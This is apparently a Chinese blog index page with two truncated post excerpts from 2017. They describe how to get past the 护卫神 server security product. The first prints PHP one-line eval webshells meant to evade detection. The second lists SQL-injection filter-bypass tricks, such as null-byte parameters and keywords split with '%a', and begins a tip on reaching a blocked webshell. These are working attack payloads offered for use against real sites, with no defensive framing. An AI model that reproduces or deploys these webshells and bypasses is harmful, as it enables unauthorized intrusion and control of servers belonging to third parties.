摘要: 一、马儿篇,都是以前可以过护卫神的马 二、注入篇,可以绕过注入的方法 三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿 一、马儿篇 1号 <?php @eval ($_POST['1']);?> 2号 <title>login</title>nono<?php eval ($_POST [1]) 阅读全文
posted @ 2017-06-03 15:04 Free_老番薯 阅读(258) 评论(0) 推荐(0) 编辑
摘要: 1.过注入 方法一:a.asp?aaa=%00&id=sql语句 (貌似被用烂了) 方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin 2.过大马被阻拦访问 方法一:上传一个大马 然后访问http:// 阅读全文
posted @ 2017-06-03 15:02 Free_老番薯 阅读(926) 评论(0) 推荐(0) 编辑